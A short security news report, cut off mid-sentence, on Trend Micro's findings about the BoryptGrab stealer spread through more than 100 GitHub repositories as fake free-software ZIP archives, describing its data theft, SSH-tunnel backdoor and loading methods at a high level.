Over 100 GitHub Repositories Distributing BoryptGrab Stealer

A new information stealer has been distributed through a network of more than 100 GitHub repositories, Trend Micro reports.

Dubbed BoryptGrab, the malware can harvest browser and cryptocurrency wallet data, along with system information and user files.

Additionally, certain iterations of the stealer can drop a backdoor dubbed TunnesshClient, which uses an SSH tunnel for command-and-control (C&C) communication.

Trend Micro’s investigation into BoryptGrab revealed the existence of multiple ZIP archives masquerading as free software tools that have been distributed since late 2025 through the GitHub repositories.

All identified binaries contained similar Russian-language comments and URL-fetching logic, although the malware’s execution logic was not the same for all ZIP archives.

In some cases, DLL sideloading was used for execution, leveraging an executable within the archive, while in others, VBS Script was used to fetch the launcher’s executable. A .NET executable, a Golang downloader named HeaconLoad, and other execution ...